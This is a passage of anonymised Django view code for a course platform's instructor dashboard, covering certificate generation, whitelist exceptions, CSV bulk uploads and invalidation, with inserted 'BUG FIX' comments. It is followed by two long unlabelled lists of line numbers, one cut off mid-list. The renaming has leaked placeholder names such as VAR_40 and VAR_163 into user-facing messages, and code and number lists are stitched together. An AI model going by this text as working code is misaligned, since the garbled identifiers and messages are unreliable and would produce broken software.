    """Split a free-form string on whitespace, newlines, and commas into non-empty tokens."""
    stripped = (piece.strip() for piece in re.split(r'[\n\r\s,]', VAR_37))
    return [token for token in stripped if token != '']
def FUNC_64(VAR_38, VAR_39=None):
    """
    Build the URL of the instructor dashboard for course `VAR_38`,
    optionally anchored at a specific section tab via a '#view-...' fragment.
    """
    # BUG FIX: the original called reverse(..., VAR_3={...}); Django's
    # reverse() takes the route arguments through the `kwargs` keyword.
    VAR_147 = reverse('instructor_dashboard', kwargs={'course_id': unicode(VAR_38)})
    if VAR_39 is not None:
        # BUG FIX: the original formatted with `VAR_39=section`, but `section`
        # is not defined in this scope (NameError) — the parameter is VAR_39.
        VAR_147 += u'#view-{VAR_39}'.format(VAR_39=VAR_39)
    return VAR_147
@FUNC_3
@require_POST
def FUNC_65(VAR_9, VAR_10=None):  # pylint: disable=unused-argument
    """Start example-certificate generation, then redirect to the certificates tab."""
    course_key = CourseKey.from_string(VAR_10)
    certs_api.generate_example_certificates(course_key)
    return redirect(FUNC_64(course_key, VAR_39='certificates'))
@FUNC_3
@require_POST
def FUNC_66(VAR_9, VAR_10=None):
    """Toggle self-generated certificates for the course per the posted flag."""
    course_key = CourseKey.from_string(VAR_10)
    # The flag arrives as the literal string 'true'/'false'.
    enable = VAR_9.POST.get('certificates-enabled', 'false') == 'true'
    certs_api.set_cert_generation_enabled(course_key, enable)
    return redirect(FUNC_64(course_key, VAR_39='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_67(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """
    Mark one student as allowed to skip the course's entrance exam.

    Idempotent: reports whether the record was newly created or already present.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_128 = VAR_9.POST.get('unique_student_identifier')
    VAR_40 = get_student_from_identifier(VAR_128)
    # `VAR_149` is True only when the skip record did not already exist.
    VAR_72, VAR_149 = EntranceExamConfiguration.objects.get_or_create(VAR_19=VAR_40, VAR_10=VAR_10)
    if VAR_149:
        VAR_74 = _('This VAR_40 (%s) will skip the entrance exam.') % VAR_128
    else:
        VAR_74 = _('This VAR_40 (%s) is already allowed to skip the entrance exam.') % VAR_128
    VAR_63 = {
        'message': VAR_74,
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_68(VAR_9, VAR_10):
    """Start the background task that generates certificates for all students."""
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_150 = instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38)
    VAR_74 = _('Certificate generation VAR_150 for all VAR_125 of this VAR_65 has been started. '
               'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.')
    VAR_63 = {
        'message': VAR_74,
        # Returned so the dashboard can poll the task's progress.
        'task_id': VAR_150.task_id
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_69(VAR_9, VAR_10):
    """
    Start certificate regeneration for students whose certificates are in the
    posted statuses. Responds 400 on an empty or invalid status selection, or
    when a regeneration task is already running.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_151 = VAR_9.POST.getlist('certificate_statuses', [])
    if not VAR_151:
        return JsonResponse(
            {'message': _('Please select one or more VAR_163 statuses that require VAR_163 regeneration.')},
            status=400
        )
    # Only these statuses are eligible for regeneration.
    VAR_152 = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
    if not set(VAR_151).issubset(VAR_152):
        return JsonResponse(
            {'message': _('Please select VAR_163 statuses from the list only.')},
            status=400
        )
    try:
        instructor_task.api.regenerate_certificates(VAR_9, VAR_38, VAR_151)
    except AlreadyRunningError as VAR_169:
        return JsonResponse({'message': VAR_169.message}, status=400)
    VAR_63 = {
        'message': _('Certificate regeneration VAR_150 has been started. '
                     'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.'),
        'success': True
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_http_methods(['POST', 'DELETE'])
def FUNC_70(VAR_9, VAR_10):
    """
    Add (POST) or remove (DELETE) a student on the certificate-exception
    white list for the course. All validation failures surface as 400s with
    a user-facing message.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    try:
        # Parse the posted record and resolve the student it names.
        VAR_41, VAR_40 = FUNC_73(VAR_9, VAR_38)
    except ValueError as VAR_169:
        return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
    if VAR_9.method == 'POST':
        try:
            VAR_154 = FUNC_71(VAR_38, VAR_40, VAR_41)
        except ValueError as VAR_169:
            return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
        return JsonResponse(VAR_154)
    elif VAR_9.method == 'DELETE':
        try:
            FUNC_72(VAR_38, VAR_40)
        except ValueError as VAR_169:
            return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
        # 204: removed successfully, no body to return.
        return JsonResponse({}, status=204)
def FUNC_71(VAR_38, VAR_40, VAR_41):
    """
    Put `VAR_40` on the certificate white list for course `VAR_38` and return
    a serialized row for the dashboard table.

    Raises ValueError if the student is already on the white list.
    """
    if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_40)) > 0:
        raise ValueError(
            _("Student (VAR_15/VAR_14={VAR_19}) already in VAR_163 VAR_154 list.").format(VAR_19=VAR_40.username)
        )
    VAR_153, VAR_72 = CertificateWhitelist.objects.get_or_create(
        VAR_19=VAR_40,
        VAR_10=VAR_38,
        defaults={
            'whitelist': True,
            'notes': VAR_41.get('notes', '')
        }
    )
    # The student may already hold a downloadable certificate; if so, surface
    # its creation date in the serialized row.
    VAR_44 = GeneratedCertificate.eligible_certificates.filter(
        VAR_19=VAR_40,
        VAR_10=VAR_38,
        status=CertificateStatuses.downloadable,
    ).first()
    VAR_154 = dict({
        'id': VAR_153.id,
        'user_email': VAR_40.email,
        'user_name': VAR_40.username,
        'user_id': VAR_40.id,
        # None/falsy when no downloadable certificate exists yet.
        'certificate_generated': VAR_44 and VAR_44.created_date.strftime("%B %d, %Y"),
        'created': VAR_153.created.strftime("%A, %B %d, %Y"),
    })
    return VAR_154
def FUNC_72(VAR_38, VAR_40):
    """
    Remove `VAR_40` from the certificate white list for `VAR_38`, invalidating
    any certificate the student already holds.

    Raises ValueError if the student is not on the white list.
    """
    try:
        VAR_41 = CertificateWhitelist.objects.get(VAR_19=VAR_40, VAR_10=VAR_38)
    except ObjectDoesNotExist:
        raise ValueError(
            _('Certificate VAR_154 (VAR_19={VAR_19}) does not exist in VAR_163 white list. '
              'Please refresh the page and try again.').format(VAR_19=VAR_40.username)
        )
    try:
        VAR_44 = GeneratedCertificate.objects.get(  # pylint: disable=no-member
            VAR_19=VAR_40,
            VAR_10=VAR_38
        )
        VAR_44.invalidate()
        VAR_0.info(
            u'Certificate invalidated for %s in VAR_65 %s when removed from VAR_163 VAR_154 list',
            VAR_40.username,
            VAR_38
        )
    except ObjectDoesNotExist:
        # No certificate was ever generated — nothing to invalidate.
        pass
    VAR_41.delete()
def FUNC_73(VAR_9, VAR_38):
    """
    Parse the posted certificate-exception record and resolve the student it
    names (by username first, then email). Raises ValueError when neither
    identifier field is filled in.
    """
    exception_record = FUNC_74(VAR_9)
    identifier = exception_record.get('user_name', '') or exception_record.get('user_email', '')
    if not identifier:
        raise ValueError(_('Student VAR_15/VAR_14 field is required and can not be empty. '
                           'Kindly fill in VAR_15/VAR_14 and then press "Add to Exception List" button.'))
    return exception_record, FUNC_75(identifier, VAR_38)
def FUNC_74(VAR_9):
    """Decode the request body as JSON; an empty body decodes to an empty dict."""
    payload = VAR_9.body or '{}'
    try:
        return json.loads(payload)
    except ValueError:
        raise ValueError(_('The record is not in the correct format. Please add a valid VAR_15 or VAR_14 address.'))
def FUNC_75(VAR_42, VAR_38):
    """
    Resolve a username or email to a User enrolled in course `VAR_38`.

    Raises ValueError (with a user-facing message) when the user does not
    exist or is not enrolled.
    """
    try:
        VAR_40 = get_user_by_username_or_email(VAR_42)
    except ObjectDoesNotExist:
        raise ValueError(_("{VAR_19} does not exist in the LMS. Please check your spelling and retry.").format(
            VAR_19=VAR_42
        ))
    # An existing account still must be enrolled to be white-listable.
    if not CourseEnrollment.is_enrolled(VAR_40, VAR_38):
        raise ValueError(_("{VAR_19} is not enrolled in this VAR_65. Please check your spelling and retry.")
                         .format(VAR_19=VAR_42))
    return VAR_40
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_76(VAR_9, VAR_10, VAR_43=None):
    """
    Start certificate generation for white-listed students.

    `VAR_43` selects the population: 'all' regenerates for every white-listed
    student, 'new' only for those without a certificate yet. Anything else
    is a 400.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    if VAR_43 == 'all':
        VAR_125 = 'all_whitelisted'
    elif VAR_43 == 'new':
        VAR_125 = 'whitelisted_not_generated'
    else:
        return JsonResponse(
            {
                'success': False,
                'message': _('Invalid VAR_192, VAR_43 must be "new" or "all".'),
            },
            status=400
        )
    instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38, student_set=VAR_125)
    VAR_63 = {
        'success': True,
        'message': _('Certificate generation started for white listed VAR_125.'),
    }
    return JsonResponse(VAR_63)
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_77(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """
    Bulk-add certificate-exception students from an uploaded CSV.

    Each CSV row is expected to be: identifier, notes. Per-row failures are
    collected (not fatal) and reported back alongside the successes.
    """
    # Column indices in each CSV row.
    VAR_156 = 0
    VAR_157 = 1
    # Buckets for the per-row error report.
    VAR_158 = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
    VAR_38 = CourseKey.from_string(VAR_10)
    VAR_125, VAR_50, VAR_159 = [], [], []
    VAR_49 = {VAR_160: [] for VAR_160 in VAR_158}

    def FUNC_86(VAR_160, VAR_161, VAR_162):
        # Record one per-row error under its bucket, tagged with the row number.
        VAR_49[VAR_160].append(_('user "{VAR_19}" in row# {row}').format(VAR_19=VAR_161, row=VAR_162))

    if 'students_list' in VAR_9.FILES:
        try:
            VAR_194 = VAR_9.FILES.get('students_list')
            if VAR_194.name.endswith('.csv'):
                VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
            else:
                VAR_50.append(_('Make sure that the file you upload is in CSV format with no '
                                'extraneous characters or VAR_124.'))
        except Exception:  # pylint: disable=broad-except
            # Any parse/read failure is reported, never raised to the client.
            VAR_50.append(_('Could not read uploaded file.'))
        finally:
            VAR_194.close()
        VAR_166 = 0
        for VAR_40 in VAR_125:
            VAR_166 += 1
            if len(VAR_40) != 2:
                # Wrong column count; blank rows are skipped silently.
                if len(VAR_40) > 0:
                    FUNC_86('data_format_error', VAR_40[VAR_156], VAR_166)
                    VAR_0.info(u'invalid VAR_192/format in VAR_26 row# %s', VAR_166)
                continue
            VAR_19 = VAR_40[VAR_156]
            try:
                VAR_19 = get_user_by_username_or_email(VAR_19)
            except ObjectDoesNotExist:
                FUNC_86('user_not_exist', VAR_19, VAR_166)
                VAR_0.info(u'student %s does not exist', VAR_19)
            else:
                if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_19)) > 0:
                    FUNC_86('user_already_white_listed', VAR_19, VAR_166)
                    VAR_0.warning(u'student %s already exist.', VAR_19.username)
                elif not CourseEnrollment.is_enrolled(VAR_19, VAR_38):
                    FUNC_86('user_not_enrolled', VAR_19, VAR_166)
                    VAR_0.warning(u'student %s is not enrolled in VAR_65.', VAR_19.username)
                else:
                    CertificateWhitelist.objects.create(
                        VAR_19=VAR_19,
                        VAR_10=VAR_38,
                        whitelist=True,
                        notes=VAR_40[VAR_157]
                    )
                    VAR_159.append(_('user "{VAR_15}" in row# {row}').format(VAR_15=VAR_19.username, row=VAR_166))
    else:
        VAR_50.append(_('File is not attached.'))
    VAR_51 = {
        'general_errors': VAR_50,
        'row_errors': VAR_49,
        'success': VAR_159
    }
    return JsonResponse(VAR_51)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_http_methods(['POST', 'DELETE'])
def FUNC_78(VAR_9, VAR_10):
    """
    Invalidate (POST) or re-validate (DELETE) one student's certificate.

    Validation problems are returned as 400s with a user-facing message.
    """
    VAR_38 = CourseKey.from_string(VAR_10)
    try:
        # Parse the posted record and locate the certificate it refers to.
        VAR_45 = FUNC_74(VAR_9)
        VAR_163 = FUNC_81(VAR_45, VAR_38)
    except ValueError as VAR_169:
        return JsonResponse({'message': VAR_169.message}, status=400)
    if VAR_9.method == 'POST':
        try:
            VAR_46 = FUNC_79(VAR_9, VAR_163, VAR_45)
        except ValueError as VAR_169:
            return JsonResponse({'message': VAR_169.message}, status=400)
        return JsonResponse(VAR_46)
    elif VAR_9.method == 'DELETE':
        try:
            FUNC_80(VAR_9, VAR_38, VAR_163)
        except ValueError as VAR_169:
            return JsonResponse({'message': VAR_169.message}, status=400)
        # 204: invalidation removed, regeneration kicked off, no body.
        return JsonResponse({}, status=204)
def FUNC_79(VAR_9, VAR_44, VAR_45):
    """
    Invalidate certificate `VAR_44` and return a serialized view of the
    created/updated CertificateInvalidation record.

    Raises ValueError when an active invalidation already exists or when the
    certificate is not currently valid.
    """
    if len(CertificateInvalidation.get_certificate_invalidations(
            VAR_44.course_id,
            VAR_44.user,
    )) > 0:
        raise ValueError(
            _("Certificate of {VAR_19} has already been invalidated. Please check your spelling and retry.").format(
                VAR_19=VAR_44.user.username,
            )
        )
    if not VAR_44.is_valid():
        raise ValueError(
            _("Certificate for VAR_40 {VAR_19} is already invalid, kindly verify that VAR_163 was generated "
              "for this VAR_40 and then proceed.").format(VAR_19=VAR_44.user.username)
        )
    # BUG FIX: the original passed `VAR_44=generated_certificate`, where
    # `generated_certificate` is undefined in this scope (NameError). The
    # model-field keyword is `generated_certificate`; the value is VAR_44.
    VAR_46, VAR_72 = CertificateInvalidation.objects.update_or_create(
        generated_certificate=VAR_44,
        defaults={
            'invalidated_by': VAR_9.user,
            'notes': VAR_45.get("notes", ""),
            'active': True,
        }
    )
    VAR_44.invalidate()
    return {
        'id': VAR_46.id,
        'user': VAR_46.generated_certificate.user.username,
        'invalidated_by': VAR_46.invalidated_by.username,
        'created': VAR_46.created.strftime("%B %d, %Y"),
        'notes': VAR_46.notes,
    }
def FUNC_80(VAR_9, VAR_38, VAR_44):
    """
    Deactivate the invalidation record for certificate `VAR_44` and kick off
    regeneration of that student's certificate.

    Raises ValueError when no invalidation record exists.
    """
    try:
        # BUG FIX: the original queried with `VAR_44=generated_certificate`,
        # where `generated_certificate` is undefined here (NameError). The
        # model-field keyword is `generated_certificate`; the value is VAR_44.
        VAR_46 = CertificateInvalidation.objects.get(generated_certificate=VAR_44)
    except ObjectDoesNotExist:
        raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
    else:
        VAR_46.deactivate()
        VAR_40 = VAR_46.generated_certificate.user
        # Regenerate only this student's certificate now that the block is lifted.
        instructor_task.api.generate_certificates_for_students(
            VAR_9, VAR_38, student_set="specific_student", specific_student_id=VAR_40.id
        )
def FUNC_81(VAR_46, VAR_38):
    """
    Resolve the posted invalidation record to the student's GeneratedCertificate.

    Raises ValueError when the identifier is missing, the user is unknown or
    not enrolled, or no certificate exists for the course.
    """
    VAR_19 = VAR_46.get("user")
    if not VAR_19:
        raise ValueError(
            _('Student VAR_15/VAR_14 field is required and can not be empty. '
              'Kindly fill in VAR_15/VAR_14 and then press "Invalidate Certificate" button.')
        )
    VAR_40 = FUNC_75(VAR_19, VAR_38)
    VAR_163 = GeneratedCertificate.certificate_for_student(VAR_40, VAR_38)
    if not VAR_163:
        # BUG FIX: the original formatted with kwargs VAR_40/VAR_65, but the
        # message's placeholders are {student} and {course} — that raised
        # KeyError at runtime instead of producing the intended message.
        raise ValueError(_(
            "The VAR_40 {student} does not have VAR_163 for the VAR_65 {course}. Kindly verify VAR_40 "
            "username/VAR_14 and the selected VAR_65 are correct and try again."
        ).format(student=VAR_40.username, course=VAR_38.course))
    return VAR_163
| [
3,
5,
39,
41,
89,
91,
94,
97,
114,
116,
117,
141,
142,
147,
155,
156,
160,
166,
172,
179,
180,
185,
192,
193,
197,
203,
209,
216,
217,
223,
226,
233,
238,
245,
246,
259,
260,
266,
270,
276,
278,
284,
285,
291,
295,
301,
303,
309,
310,
315,
316,
326,
329,
334,
338,
341,
346,
347,
348,
353,
356,
367,
374,
379,
380,
389,
390,
395,
404,
405,
407,
408,
409,
415,
426,
427,
429,
440,
441,
442,
448,
453,
460,
461,
470,
472,
473,
478,
482,
484,
486,
487,
491,
497,
503,
508,
510,
511,
515,
529,
532,
533,
542,
552,
558,
560,
561,
581,
603,
605,
606,
615,
625,
666,
671,
674,
685,
687,
688,
689,
700,
713,
721,
729,
734,
736,
737,
742,
744,
745,
752,
762,
769,
770,
782,
797,
802,
808,
820,
821,
827,
830,
832,
835,
837,
843,
849,
850,
864,
866,
884,
885,
886,
887,
894,
897,
902,
903,
912,
921,
929,
930,
939,
941,
958,
960,
963,
972,
980,
981,
990,
993,
995,
1000,
1003,
1011,
1026,
1027,
1040,
1046,
1047,
1061,
1063,
1067,
1077,
1078,
1113,
1119,
1120,
1143,
1153,
1158,
1159,
1170,
1171,
1178,
1183,
1184,
1196,
1200,
1223,
1224,
1232,
1235,
1240,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1252,
1259,
1260,
1261,
1262,
1276,
1278,
1281,
1285,
1286,
1291,
1315,
1316,
1325,
1328,
1347,
1348,
1361,
1380,
1387,
1391,
1393,
1394,
1404,
1418,
1422,
1423,
1446,
1447,
1471,
1472,
1495,
1496,
1515,
1530,
1531,
1536,
1544,
1547,
1550,
1551,
1557,
1575,
1576,
1585,
1590,
1594,
1595,
1603,
1604,
1614,
1615,
1619,
1623,
1626,
1627,
1638,
1639,
1644,
1649,
1662,
1678,
1699,
1706,
1709,
1720,
1723,
1730,
1742,
1748,
1769,
1772,
1774,
1775,
1786,
1788,
1789,
1804,
1806,
1807,
1817,
1818,
1822,
1826,
1832,
1833,
1835,
1837,
1838,
1848,
1849,
1856,
1857,
1861,
1865,
1868,
1869,
1877,
1878,
1879,
1881,
1887,
1888,
1895,
1902,
1903,
1915,
1923,
1925,
1931,
1932,
1943,
1947,
1963,
1971,
1972,
1981,
1982,
1986,
1991,
1994,
2007,
2017,
2019,
2020,
2028,
2032,
2046,
2051,
2058,
2059,
2068,
2069,
2073,
2082,
2085,
2086,
2097,
2102,
2111,
2113,
2116,
2121,
2126,
2129,
2139,
2141,
2142,
2152,
2156,
2163,
2168,
2170,
2175,
2180,
2185,
2194,
2195,
2205,
2207,
2212,
2213,
2223,
2225,
2230,
2231,
2238,
2250,
2255,
2262,
2265,
2268,
2270,
2275,
2276,
2283,
2293,
2299,
2302,
2304,
2309,
2310,
2320,
2328,
2329,
2340,
2348,
2349,
2362,
2371,
2373,
2374,
2394,
2395,
2404,
2421,
2422,
2431,
2435,
2444,
2446,
2447,
2452,
2453,
2456,
2457,
2462,
2468,
2477,
2483,
2484,
2501,
2504,
2508,
2509,
2510,
2511,
2512,
2513,
2516,
2517,
2518,
2519,
2531,
2532,
2534,
2540,
2541,
2554,
2559,
2571,
2575,
2576,
2581,
2582,
2585,
2590,
2592,
2597,
2603,
2604,
2614,
2618,
2619,
2629,
2630,
2645,
2650,
2651,
2666,
2670,
2676,
2677,
2690,
2691,
2705,
2706,
2710,
2714,
2718,
2722,
2724,
2725,
2728,
2731,
2734,
2737,
2743,
2744,
2749,
2752,
2755,
2760,
2761,
2766,
2769,
2772,
2778,
2779,
2792,
2802,
2803,
2822,
2823,
2841,
2842,
2853,
2860,
2861,
2870,
2876,
2881,
2882,
2889,
2890,
2896,
2898,
2899,
2904,
2914,
2923,
2929,
2938,
2940,
2941,
2947,
2959,
2972,
2975,
2976,
2981,
2987,
2993,
2995,
2996,
3000,
3008,
3010,
3011,
3016,
3027,
3028,
3033,
3034,
3043,
3051,
3053,
3055,
3058,
3060,
3068,
3070,
3075,
3077,
3078,
3104,
3110,
3119,
3124,
3128,
3129,
3135,
3146,
3147,
3151,
3160,
3163,
3169,
3171,
3172,
3181,
3187,
3193,
3194,
3201,
3202,
3208,
3210,
3211,
3215,
3230,
3231,
3237,
3238,
3247,
3248,
3257,
3258,
3263,
3269,
3274,
3276,
3277,
3282,
3283,
3287,
3290,
3296,
3302,
3304,
3312,
1,
2,
3,
4,
5,
6,
7,
119,
120,
121,
122,
144,
145,
146,
147,
148,
149,
150,
151,
182,
183,
184,
185,
186,
187,
188,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
248,
262,
263,
264,
265,
266,
267,
268,
287,
288,
289,
290,
291,
292,
293,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
333,
334,
335,
336,
337,
463,
464,
465,
475,
476,
477,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
513,
514,
515,
516,
517,
518,
519,
520,
521,
522,
523,
524,
535,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
547,
548,
549,
550,
551,
552,
553,
554,
612,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
780,
781,
782,
783,
784,
785,
786,
787,
861,
862,
863,
864,
865,
866,
867,
868,
869,
870,
871,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
947,
948,
949,
950,
951,
952,
953,
987,
988,
989,
990,
991,
992,
993,
994,
995,
996,
997,
1032,
1033,
1034,
1052,
1053,
1054,
1083,
1084,
1085,
1124,
1125,
1126,
1161,
1162,
1163,
1173,
1174,
1175,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1230,
1231,
1232,
1233,
1234,
1235,
1236,
1237,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1355,
1356,
1357,
1358,
1359,
1399,
1400,
1401,
1430,
1431,
1432,
1454,
1455,
1456,
1478,
1479,
1480,
1502,
1503,
1504,
1533,
1534,
1535,
1536,
1537,
1538,
1539,
1540,
1541,
1542,
1543,
1544,
1545,
1546,
1547,
1548,
1578,
1579,
1580,
1581,
1582,
1583,
1584,
1597,
1598,
1599,
1600,
1610,
1611,
1612,
1633,
1634,
1635,
1813,
1814,
1815,
1844,
1845,
1846,
1874,
1875,
1876,
1912,
1913,
1914,
1915,
1916,
1917,
1918,
1919,
1920,
1942,
1943,
1944,
1945,
1946,
1947,
1948,
1949,
1950,
1951,
1952,
1953,
1954,
1955,
1956,
1957,
1958,
2027,
2028,
2029,
2030,
2031,
2032,
2033,
2034,
2035,
2036,
2037,
2038,
2039,
2040,
2041,
2094,
2095,
2096,
2097,
2098,
2099,
2100,
2101,
2102,
2103,
2104,
2149,
2150,
2151,
2152,
2153,
2154,
2155,
2156,
2157,
2158,
2200,
2201,
2202,
2218,
2219,
2220,
2236,
2237,
2238,
2239,
2240,
2241,
2242,
2243,
2244,
2281,
2282,
2283,
2284,
2285,
2286,
2287,
2315,
2316,
2317,
2335,
2336,
2337,
2355,
2356,
2357,
2380,
2381,
2382,
2401,
2402,
2403,
2404,
2405,
2406,
2407,
2428,
2429,
2430,
2431,
2432,
2433,
2434,
2435,
2436,
2437,
2491,
2492,
2493,
2494,
2495,
2496,
2497,
2498,
2499,
2552,
2553,
2554,
2555,
2556,
2557,
2558,
2559,
2560,
2561,
2562,
2563,
2564,
2607,
2608,
2609,
2621,
2622,
2623,
2637,
2638,
2639,
2658,
2659,
2660,
2684,
2685,
2686,
2698,
2699,
2700,
2701,
2708,
2709,
2710,
2711,
2712,
2713,
2714,
2715,
2716,
2717,
2727,
2728,
2729,
2730,
2731,
2732,
2733,
2734,
2735,
2736,
2737,
2738,
2748,
2749,
2750,
2751,
2752,
2753,
2754,
2755,
2756,
2765,
2766,
2767,
2768,
2769,
2770,
2771,
2772,
2773,
2785,
2786,
2787,
2788,
2810,
2811,
2812,
2830,
2831,
2832,
2833,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2901,
2902,
2903,
2904,
2905,
2906,
2907,
2908,
2909,
2943,
2944,
2945,
2946,
2947,
2948,
2949,
2950,
2951,
2978,
2979,
2980,
2981,
2982,
2983,
2984,
2985,
2998,
2999,
3000,
3001,
3002,
3003,
3013,
3014,
3015,
3016,
3017,
3018,
3019,
3020,
3041,
3042,
3043,
3044,
3045,
3046,
3047,
3048,
3049,
3084,
3085,
3086,
3087,
3088,
3089,
3090,
3091,
3092,
3093,
3094,
3095,
3096,
3097,
3179,
3180,
3181,
3182,
3183,
3184,
3185,
3213,
3214,
3215,
3216,
3217,
3218,
3219,
3220,
3260,
3261,
3262,
3263,
3264,
3265,
3266,
3267,
3285,
3286,
3287,
3288,
3289,
3290,
3291,
3292,
3293,
3294,
965,
1883,
2470,
3106,
3107,
3108,
1364,
1365,
1366
] | [
3,
5,
39,
41,
89,
91,
94,
97,
114,
116,
117,
141,
142,
147,
155,
156,
160,
166,
172,
179,
180,
186,
189,
196,
201,
208,
209,
222,
223,
229,
233,
239,
241,
247,
248,
254,
258,
264,
266,
272,
273,
278,
279,
290,
293,
298,
302,
305,
310,
311,
312,
317,
320,
331,
338,
343,
344,
353,
354,
359,
368,
369,
371,
372,
373,
379,
390,
391,
393,
404,
405,
406,
412,
417,
424,
425,
434,
436,
437,
442,
446,
448,
450,
451,
455,
461,
467,
472,
474,
475,
479,
493,
496,
497,
506,
516,
522,
524,
525,
545,
567,
569,
570,
580,
590,
631,
636,
639,
650,
652,
653,
654,
665,
678,
686,
694,
699,
701,
702,
707,
709,
710,
717,
727,
734,
735,
748,
763,
768,
774,
786,
787,
793,
796,
798,
801,
803,
809,
815,
816,
831,
833,
851,
852,
853,
854,
861,
864,
869,
870,
879,
888,
896,
897,
907,
909,
926,
928,
931,
940,
948,
949,
959,
962,
964,
969,
972,
980,
995,
996,
1010,
1016,
1017,
1031,
1033,
1037,
1047,
1048,
1083,
1089,
1090,
1113,
1123,
1128,
1129,
1140,
1141,
1148,
1153,
1154,
1166,
1170,
1193,
1194,
1203,
1206,
1211,
1213,
1214,
1215,
1216,
1217,
1218,
1219,
1220,
1221,
1223,
1230,
1231,
1232,
1233,
1247,
1249,
1252,
1256,
1257,
1262,
1286,
1287,
1297,
1300,
1319,
1320,
1333,
1352,
1359,
1363,
1365,
1366,
1376,
1390,
1394,
1395,
1419,
1420,
1445,
1446,
1470,
1471,
1491,
1506,
1507,
1512,
1520,
1523,
1526,
1527,
1533,
1551,
1552,
1561,
1566,
1570,
1571,
1579,
1580,
1590,
1591,
1595,
1599,
1602,
1603,
1614,
1615,
1620,
1625,
1638,
1654,
1675,
1682,
1685,
1696,
1699,
1706,
1718,
1724,
1745,
1748,
1750,
1751,
1762,
1764,
1765,
1780,
1782,
1783,
1793,
1794,
1798,
1802,
1808,
1809,
1811,
1813,
1814,
1824,
1825,
1832,
1833,
1837,
1841,
1844,
1845,
1853,
1854,
1855,
1857,
1863,
1864,
1871,
1878,
1879,
1892,
1900,
1902,
1908,
1909,
1921,
1925,
1941,
1949,
1950,
1959,
1960,
1964,
1969,
1972,
1985,
1995,
1997,
1998,
2007,
2011,
2025,
2030,
2037,
2038,
2047,
2048,
2052,
2061,
2064,
2065,
2077,
2082,
2091,
2093,
2096,
2101,
2106,
2109,
2119,
2121,
2122,
2133,
2137,
2144,
2149,
2151,
2156,
2161,
2166,
2175,
2176,
2187,
2189,
2194,
2195,
2206,
2208,
2213,
2214,
2222,
2234,
2239,
2246,
2249,
2252,
2254,
2259,
2260,
2268,
2278,
2284,
2287,
2289,
2294,
2295,
2306,
2314,
2315,
2327,
2335,
2336,
2350,
2359,
2361,
2362,
2383,
2384,
2394,
2411,
2412,
2422,
2426,
2435,
2437,
2438,
2443,
2444,
2447,
2448,
2453,
2459,
2468,
2474,
2475,
2493,
2496,
2500,
2501,
2502,
2503,
2504,
2505,
2508,
2509,
2510,
2511,
2523,
2524,
2526,
2532,
2533,
2547,
2552,
2564,
2568,
2569,
2574,
2575,
2578,
2583,
2585,
2590,
2596,
2597,
2607,
2611,
2612,
2622,
2623,
2639,
2644,
2645,
2661,
2665,
2671,
2672,
2686,
2687,
2702,
2703,
2707,
2711,
2715,
2719,
2721,
2722,
2725,
2728,
2731,
2734,
2740,
2741,
2746,
2749,
2752,
2757,
2758,
2763,
2766,
2769,
2775,
2776,
2789,
2799,
2800,
2819,
2820,
2838,
2839,
2850,
2857,
2858,
2867,
2873,
2878,
2879,
2886,
2887,
2893,
2895,
2896,
2901,
2911,
2920,
2926,
2935,
2937,
2938,
2944,
2956,
2969,
2972,
2973,
2978,
2984,
2990,
2992,
2993,
2997,
3005,
3007,
3008,
3013,
3024,
3025,
3030,
3031,
3040,
3048,
3050,
3052,
3055,
3057,
3065,
3067,
3072,
3074,
3075,
3100,
3106,
3115,
3120,
3124,
3125,
3131,
3142,
3143,
3147,
3156,
3159,
3165,
3167,
3168,
3177,
3183,
3189,
3190,
3197,
3198,
3204,
3206,
3207,
3211,
3226,
3227,
3233,
3234,
3243,
3244,
3253,
3254,
3259,
3265,
3270,
3272,
3273,
3278,
